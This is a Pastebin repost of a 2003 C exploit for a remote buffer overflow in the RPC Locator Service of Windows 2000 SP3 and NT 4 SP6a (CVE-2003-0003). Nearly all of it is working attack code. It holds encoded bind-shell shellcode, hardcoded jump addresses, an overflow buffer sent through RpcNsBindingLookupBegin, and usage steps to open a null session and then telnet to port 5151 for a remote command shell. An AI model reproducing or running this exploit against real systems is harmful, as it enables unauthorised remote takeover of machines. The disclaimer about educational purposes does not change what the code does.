API tools faq
paste
Advertisement
FlyFar

Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow - CVE-2003-0003

FlyFar
Jan 23rd, 2024
768
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.76 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /****************************************************************************
  2. rpcexp.c
  3. RPC LOCATOR Exploit
  4. Autor: Marcin Wolak
  5. mail: mwolak11@wp.pl
  6. Last update: 30 march 2003
  7. ****************************************************************************/
  8.  
  9. /*****************************************************************************
  10. About Compilation:
  11. What You need to compile rpcexp.c ?
  12. 1. MS Platform SDK (August SDK is sufficient).
  13. 2. Compilator (f.e. MS Visual C++ 6.0).
  14. rpcns4.lib is needed for linking.
  15. *****************************************************************************/
  16.  
  17. /*****************************************************************************
  18. Usage (You want to exploit remote Windows 2000 system (w2khost) with running RPC
  19. Locator Service):
  20. 1. Set registry values in Your workstation as below:
  21. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\NameService\NetworkAddress = w2khost
  22. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\NameService\ServerNetworkAddress = w2khost
  23. 2. Establish null session:
  24. net use \\w2khost\ipc$ ""/u: ""
  25. 3. Run Exploit:
  26. rpcexp.exe /os w2ksp3
  27.  
  28. If everything it's ok, rpcexp hangs in console window. You can go to second
  29. cmd console, run telnet (on port 5151) and get cmd on w2khost - just run
  30. on second console:
  31.  
  32. telnet w2khost 5151
  33.  
  34. WARNNING !
  35. With this shellcode You can get remote cmd only once. Second attempt will
  36. be rejected.
  37.  
  38. WARNNING !!
  39. Currently only Windows 2000 Sp3 and Windows NT 4 Sp6a are exploitable with
  40. rpcexp.
  41.  
  42. *****************************************************************************/
  43.  
  44. #define UNICODE
  45. #define RPC_UNICODE_SUPPORTED
  46.  
  47. #define NT4SP6ABRD 0x42
  48. #define W2KSP3BRD 0x142
  49.  
  50. #define NT4SP6AJMP 0x0147FBC4
  51. #define W2KSP3JMP 0x0090F8F0
  52.  
  53. #define NT4SP6ALLA 0x77F137BD
  54. #define NT4SP6AGPA 0x77F13FB3
  55.  
  56. #include <stdio.h>
  57. #include <rpc.h>
  58. #include <rpcnsi.h>
  59.  
  60.  
  61. #define PURPOSE \
  62. "RPC Locator exploit utility \n\
  63. Autor: Marcin Wolak - march 2003 \n\
  64. mail: mwolak@gazeta.pl \n\n\
  65. Tested on:\n\n\
  66. Windows 2000 SP3 \n\
  67. Windows NT 4.0 SP6a \n\n\
  68. Only for educational purposes !!!.\n\n\
  69. Usage:\n\
  70. rpcexp.exe /v  - to view rpcexp info.\n\
  71. rpcexp.exe /os w2ksp3 - to exploit Windows 2000 Sp3.\n\
  72. rpcexp.exe /os ntsp6a - to exploit Windows NT 4 Sp6a.\n"
  73.  
  74.  
  75. char shellcode [] =
  76. "\xEB\x13\x5F\xB9\xCF\x02\xCF\x02\xC1\xE9\x10\x57\x80\x37\x99\x47\xE2\xFA\x5F\xEB"
  77. "\x05\xE8\xE8\xFF\xFF\xFF\x14\x2E\x42\x98\x99\x99\x14\x06\x59\x9B\x99\x99\xCF\x66"
  78. "\x8A\xCE\x14\x06\x5D\x9B\x99\x99\x14\x26\x54\x9B\x99\x99\x10\x5B\x65\xA8\x50\x28"
  79. "\x94\xD0\xA9\x59\x35\x1D\x59\xEC\x60\xCA\xCB\xC8\xCF\xCB\x66\x8A\x32\xC0\xC3\xC2"
  80. "\x7B\x75\xC2\xCA\x14\x02\x59\x9B\x99\x99\xA9\x59\x35\x1D\x59\xEC\x60\xCF\x66\x8A"
  81. "\x10\x5B\xC2\xCA\x14\x02\x5D\x9B\x99\x99\x65\xA8\x50\x28\x9E\xA9\x59\x35\x1D\x59"
  82. "\xEC\x60\xCA\xCB\xC8\xCF\xCB\x66\x8A\x32\xC0\xC3\xC2\x7B\x75\xA8\x59\x2D\x9D\xC9"
  83. "\x58\x71\x9D\xC9\x66\xCE\x55\x10\x5B\xC2\xCA\x14\x02\x25\x99\x99\x99\xA8\x50\x18"
  84. "\x58\xC4\x9B\x99\x99\xC9\x13\x8A\x11\x89\xDA\xD9\x7B\x61\xC1\x14\x02\x15\x99\x99"
  85. "\x99\xCA\xF1\x99\x99\x99\x99\xC9\xC9\xF1\x99\x99\x99\x99\xF1\x99\x99\x99\x99\x66"
  86. "\xCE\x21\xC9\xF1\x99\x89\x99\x99\x66\xCE\x41\xC1\x72\x6D\x70\x9E\x9B\x99\x99\xC6"
  87. "\xCE\x18\x5E\xD5\x99\x99\x99\x10\x67\x18\x5F\x16\x66\x66\x66\xC2\x18\x5A\x39\x99"
  88. "\x99\x99\xCA\xF1\x9B\x9B\x99\x99\x66\xCE\x7D\xA8\x59\xC9\xD9\xC9\xD9\xC9\x66\xCE"
  89. "\x71\x0A\xF1\x89\x99\x99\x99\xCF\xCA\x66\xCE\x75\xF1\x9B\x99\x99\x99\xCA\x66\xCE"
  90. "\x69\xA8\x59\xCE\xC9\x29\x95\x32\xC1\x32\xD9\x32\xC6\xD1\xC9\xCE\xCF\x34\xCF\x66"
  91. "\xCE\x25\xD1\xC9\xCE\x34\xCF\x34\xCF\x66\xCE\x25\xD1\x29\xDD\x10\x9E\xCE\x66\xCE"
  92. "\x59\xA8\x59\x12\xDF\x6D\x10\xDE\xA5\x10\xDE\xD9\x12\x9F\x10\xDE\xA1\xA8\x59\xFF"
  93. "\x21\x98\x98\x10\xDE\xB5\xCE\xCE\xA8\x59\xC9\xC9\xC9\xD9\xC9\xD1\xC9\xC9\x34\xCF"
  94. "\xA8\x59\xC9\x66\xCE\x5D\x66\xEF\x69\x66\xCE\x79\x66\xEF\x65\x66\xCE\x79\xD1\xC9"
  95. "\xC9\xCA\x66\xCE\x6D\x10\x5A\xA8\x59\x2D\x9D\xC9\x58\x71\x9D\xC9\x66\xCE\x55\x10"
  96. "\x5F\xA8\x59\x10\x58\x2C\x9D\xC9\xC9\xCE\xC8\xCF\x66\xEE\x0A\x66\xCE\x51\x18\xA6"
  97. "\x98\x99\x99\x99\xE5\xBC\xA8\x59\xC9\xCE\x66\xAE\xCF\x66\xEE\x0A\x66\xCE\x4D\x90"
  98. "\x59\xED\x8D\xA8\x59\xC9\x66\xAE\xCF\xCA\x66\xCE\x61\xF1\xC9\x99\x99\x99\x66\xCE"
  99. "\x41\x72\x5B\xA8\x59\xC9\x2D\x9D\xC9\xCF\xCA\x66\xCE\x65\xCE\xA8\x50\xC8\xC9\xCF"
  100. "\x66\xEE\x0E\x66\xCE\x49\xF1\xC9\x99\x99\x99\x66\xCE\x41\x72\x38\xC9\x66\xCE\x45"
  101. "\x09\xD2\xDC\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD"
  102. "\x99\xDA\xEB\xFC\xF8\xED\xFC\xCD\xF1\xEB\xFC\xF8\xFD\x99\xDA\xEB\xFC\xF8\xED\xFC"
  103. "\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8"
  104. "\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xC9\xFC\xFC\xF2"
  105. "\xD7\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6"
  106. "\xFA\x99\xCE\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC"
  107. "\x99\xCA\xF5\xFC\xFC\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xDA"
  108. "\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xCE\xCA\xD6\xDA\xD2\xAA\xAB\x99\xCE"
  109. "\xCA\xD8\xCA\xED\xF8\xEB\xED\xEC\xE9\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7"
  110. "\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD"
  111. "\x99\xEB\xFC\xFA\xEF\x99\x9B\x99\x8D\x86\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  112. "\x99\x99\xFA\xF4\xFD\xB7\xFC\xE1\xFC\x99\xFD\x06\x71\xEE\x81\x02\x71\xEE\x71\x6D"
  113. "\x64\x66\x66\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
  114.  
  115. void Usage(char * pszProgramName)
  116. {
  117.     fprintf(stderr, "%s", PURPOSE);
  118.     exit(1);
  119. }
  120.  
  121. void _CRTAPI1 main(int argc, char **argv)
  122. {
  123.     unsigned short mytab[2000];             // Exploit Buffer
  124.     unsigned char * TmpEntryName  = NULL;       // Temporary Entry.
  125.     unsigned long * EntryName  = NULL;
  126.     unsigned long * TmpPtr  = NULL;
  127.     unsigned short * pszStrBinding = NULL;
  128.     RPC_NS_HANDLE hnsHandle;
  129.     unsigned long NsSntxType = RPC_C_NS_SYNTAX_DEFAULT;
  130.     RPC_STATUS status;
  131.     short fSuccess = 0;
  132.     short fContinue = 1;
  133.     unsigned long i,k;
  134.  
  135.     unsigned long * PtrLLA = (unsigned long*) &shellcode[730];
  136.     unsigned long * PtrGPA = (unsigned long*) &shellcode[734];
  137.     unsigned long JMP = W2KSP3JMP;
  138.     unsigned long BORDER = W2KSP3BRD;
  139.  
  140.     switch(argc){
  141.         case 2:
  142.             if((strlen(argv[1]) == 2) && (!strcmp(argv[1],"/v")))
  143.                 Usage(argv[0]);
  144.             else
  145.                 printf("Bad arguments !!!\n");
  146.             exit(2);
  147.         case 3:
  148.             if((strlen(argv[1]) == 3) && (strlen(argv[2]) == 6) &&
  149.                (!strcmp(argv[1],"/os")) && (!strcmp(argv[2],"w2ksp3")))
  150.                break;
  151.             if((strlen(argv[1]) == 3) && (strlen(argv[2]) == 6) &&
  152.                (!strcmp(argv[1],"/os")) && (!strcmp(argv[2],"ntsp6a")))
  153.             {
  154.                 (*PtrLLA) = NT4SP6ALLA ^ 0x99999999;
  155.                 (*PtrGPA) = NT4SP6AGPA ^ 0x99999999;
  156.                 JMP = NT4SP6AJMP;
  157.                 BORDER = NT4SP6ABRD;
  158.                 break;
  159.             }
  160.         default:
  161.             Usage(argv[0]);
  162.  
  163.     }
  164.  
  165.     EntryName = (unsigned long *) mytab;
  166.     TmpEntryName = (unsigned char *) mytab;
  167.     TmpEntryName[0] = '/';
  168.     TmpEntryName[1] = 0;
  169.     TmpEntryName[2] = '.';
  170.     TmpEntryName[3] = 0;
  171.     TmpEntryName[4] = ':';
  172.     TmpEntryName[5] = 0;
  173.     TmpEntryName[6] = '/';
  174.     TmpEntryName[7] = 0;
  175.     for (i=2;i<768;i++)
  176.     {
  177.         if(i <= BORDER)
  178.             EntryName[i] = JMP;
  179.         if(i == BORDER)
  180.         {
  181.             TmpPtr = (unsigned long*) shellcode;
  182.             for(k = 0;k < 190;k++)
  183.                 EntryName[i+k] = TmpPtr[k];
  184.             i += 189;
  185.         }
  186.         if(i > BORDER)
  187.             EntryName[i] = JMP;
  188.     }
  189.     EntryName[768] = 0;
  190.  
  191.       RpcTryExcept {
  192.           status = RpcNsBindingLookupBegin(NsSntxType,
  193.                                          (unsigned short *) EntryName,
  194.                                          0,
  195.                                          NULL,
  196.                             0,
  197.                             &hnsHandle);
  198.           printf("RpcNsBindingLookupBegin returned 0x%x\n", status);
  199.       }
  200.       RpcExcept(1){
  201.           printf("RPC Runtime raised exception 0x%x\n", RpcExceptionCode());
  202.       }
  203.       RpcEndExcept
  204. } /*End of Main*/
  205.  
  206. // milw0rm.com [2003-04-03]
  207.            
Tags: Exploit Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!